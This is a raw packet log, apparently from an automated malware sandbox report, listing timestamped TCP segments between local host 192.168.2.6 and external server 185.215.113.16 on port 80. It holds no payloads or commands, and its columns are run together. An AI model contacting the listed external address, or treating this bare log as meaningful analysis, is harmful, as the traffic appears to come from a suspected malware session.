                                                                            Oct 31, 2024 20:49:52.684675932 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:52.684726954 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:52.684748888 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:52.724555016 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:52.879791021 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:52.879822016 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:52.879832983 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:52.879899979 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:52.880516052 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:52.880528927 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:52.880539894 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:52.880553007 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:52.880578041 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:52.880578041 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:52.881426096 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:52.881454945 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:52.881465912 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:52.881479025 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:52.881490946 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:52.881503105 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:52.881513119 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:52.881513119 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:52.881515980 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:52.881561995 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:52.881561995 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:52.882045984 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:52.882056952 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:52.882100105 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:52.882719040 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:52.882730007 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:52.882742882 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:52.882793903 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:52.889971018 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:52.890209913 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:52.890224934 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:52.890237093 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:52.890340090 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:52.893650055 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:52.895502090 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:52.895566940 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:52.934458017 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:52.934540987 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:52.934556007 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:52.934626102 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:52.936680079 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:52.936749935 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:53.077542067 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:53.077558994 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:53.077570915 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:53.077605963 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:53.077817917 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:53.077830076 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:53.077841043 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:53.077852964 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:53.077879906 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:53.077879906 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:53.078522921 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:53.078533888 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:53.078542948 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:53.078555107 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:53.078571081 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:53.078572035 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:53.078589916 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:53.078643084 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:53.079544067 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:53.079566956 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:53.079576969 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:53.079587936 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:53.079602957 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:53.079638958 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:53.089802980 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:53.089992046 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:53.090064049 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:53.116003990 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:53.116018057 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:53.116127014 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:53.131576061 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:53.131607056 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:53.131656885 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:53.166095018 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:53.166109085 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:53.166120052 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:53.166203976 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:53.166476965 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:53.166495085 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:53.166506052 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:53.166538954 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:53.166539907 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:53.196427107 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:53.196456909 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:53.196552038 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:53.234961033 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:53.235035896 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:53.235047102 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:53.235295057 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:53.284987926 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:53.285052061 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:53.285063982 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:53.285068989 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:53.285108089 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:53.285448074 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:53.285510063 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:53.285520077 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:53.285531044 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:53.285543919 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:53.285609961 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:53.285609961 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:53.285866976 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:53.285902977 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:53.354386091 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:53.354473114 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:53.354485035 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:53.354542971 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:53.396352053 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:53.403708935 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:53.403801918 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:53.403814077 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:53.403851032 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:53.404277086 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:53.404390097 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:53.404747009 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:53.404757977 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:53.404792070 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:53.404879093 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:53.404890060 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:53.404901028 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:53.404942989 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:53.473153114 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:53.473292112 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:53.473303080 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:53.473423958 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:53.522551060 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:53.522563934 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:53.522630930 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:53.522639036 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:53.522805929 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:53.522814989 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:53.522825956 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:53.522845984 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:53.522905111 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:53.523142099 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:53.523380041 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:53.523394108 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:53.523406029 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:53.523418903 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:53.523447990 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:53.523840904 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:53.524251938 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:53.524261951 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:53.524317980 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:53.592269897 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:53.592359066 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:53.592369080 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:53.592413902 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:53.642158031 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:53.642172098 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:53.642188072 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:53.642194033 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:53.642230988 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:53.642242908 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:53.642261982 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:53.642298937 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:53.642931938 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:53.642941952 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:53.642951965 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:53.642999887 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:53.642999887 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:53.686191082 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:53.686204910 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:53.686216116 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:53.686300039 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:53.711044073 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:53.711102962 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:53.711112976 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:53.711193085 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:53.711251974 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:53.760350943 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:53.760416985 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:53.760430098 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:53.760467052 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:53.761126041 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:53.761224031 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:53.761234999 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:53.761262894 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:53.761307001 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:53.804996014 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:53.805049896 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:53.805061102 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:53.805109024 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:53.805388927 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:53.805399895 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:53.805437088 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:53.829961061 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:53.829981089 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:53.829987049 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:53.830049992 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:53.879118919 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:53.879133940 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:53.879206896 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:53.879209995 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:53.879260063 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:53.879298925 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:53.879812002 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:53.879906893 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:53.880017042 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:53.880021095 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:53.923974037 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:53.924053907 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:53.924072027 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:53.924076080 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:53.924118042 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:53.924820900 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:53.924866915 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:53.924877882 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:53.924926996 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:53.948826075 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:53.948899984 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:53.948965073 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:53.948976040 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:53.949065924 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:54.006630898 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:54.006668091 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:54.006681919 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:54.006731033 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:54.006969929 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:54.006979942 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:54.007011890 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:54.042773962 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:54.042841911 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:54.042853117 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:54.042898893 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:54.042898893 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:54.043674946 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:54.043766975 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:54.043777943 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:54.043904066 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:54.067698956 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:54.067740917 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:54.067751884 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:54.067811012 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:54.067811012 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:54.125475883 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:54.125499964 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:54.125510931 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:54.125713110 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:54.125801086 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:54.125812054 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:54.125861883 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:54.161587954 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:54.161659956 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:54.161673069 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:54.161678076 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:54.161911011 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:54.161947012 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:54.161961079 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:54.162054062 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:54.162544012 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:54.162688017 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:54.162700891 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:54.162820101 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:54.186978102 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:54.186990023 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:54.187041998 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:54.187060118 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:54.187078953 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:54.187103987 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:54.240192890 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:54.244155884 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:54.244211912 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:54.244225979 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:54.244293928 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:54.244472027 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:54.244529009 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:54.280752897 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:54.280808926 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:54.280822039 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:54.280914068 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:54.281090975 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:54.281102896 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:54.281130075 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:54.281794071 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:54.281873941 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:54.281886101 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:54.281899929 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:54.281919956 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:54.306226015 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:54.306238890 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:54.306250095 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:54.306282997 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:54.349534988 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:54.362886906 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:54.363006115 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:54.363017082 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:54.363079071 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:54.363272905 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:54.363285065 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:54.363329887 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:54.399396896 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:54.399451017 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:54.399462938 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:54.399529934 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:54.399560928 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:54.399770975 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:54.399928093 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:54.399939060 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:54.399996042 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:54.400774002 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:54.400794983 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:54.400805950 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:54.400846004 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:54.400846004 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:54.425209999 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:54.425331116 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:54.425343037 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:54.425409079 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:54.483545065 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:54.483557940 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:54.483570099 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:54.483620882 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:54.483753920 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:54.483767033 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:54.483849049 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:54.519220114 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:54.519330025 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:54.519372940 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:54.519386053 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:54.519422054 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:54.519700050 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:54.519711018 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:54.519766092 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:54.520792007 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:54.520986080 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:54.520998001 CET8049749185.215.113.16192.168.2.6
